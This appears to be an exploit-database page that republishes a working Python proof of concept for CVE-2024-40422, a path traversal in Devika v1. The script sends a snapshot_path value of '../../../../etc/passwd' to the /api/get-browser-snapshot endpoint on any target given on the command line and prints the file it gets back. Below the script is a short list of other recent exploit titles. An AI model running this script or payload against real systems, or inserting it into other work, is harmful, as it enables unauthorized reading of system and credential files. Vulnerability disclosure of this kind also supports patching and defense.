Devika v1 path traversal via snapshot_path Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-08-04 | Type : webapps | Platform : python
This exploit / vulnerability Devika v1 path traversal via snapshot_path is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422

#!/usr/bin/python

import argparse
import requests

def exploit(target_url):
url = f'http://{target_url}/api/get-browser-snapshot'
params = {
'snapshot_path': '../../../../etc/passwd'
}

response = requests.get(url, params=params)
print(response.text)

if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
args = parser.parse_args()

exploit(args.target)

Devika v1 path traversal via snapshot_path


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Devika v1 path traversal via snapshot_path Vulnerability / Exploit